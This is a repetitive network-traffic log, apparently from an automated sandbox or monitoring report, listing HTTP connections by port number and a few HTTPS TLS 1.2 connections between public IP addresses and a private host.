Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.247:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49925 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50024 version: TLS 1.2
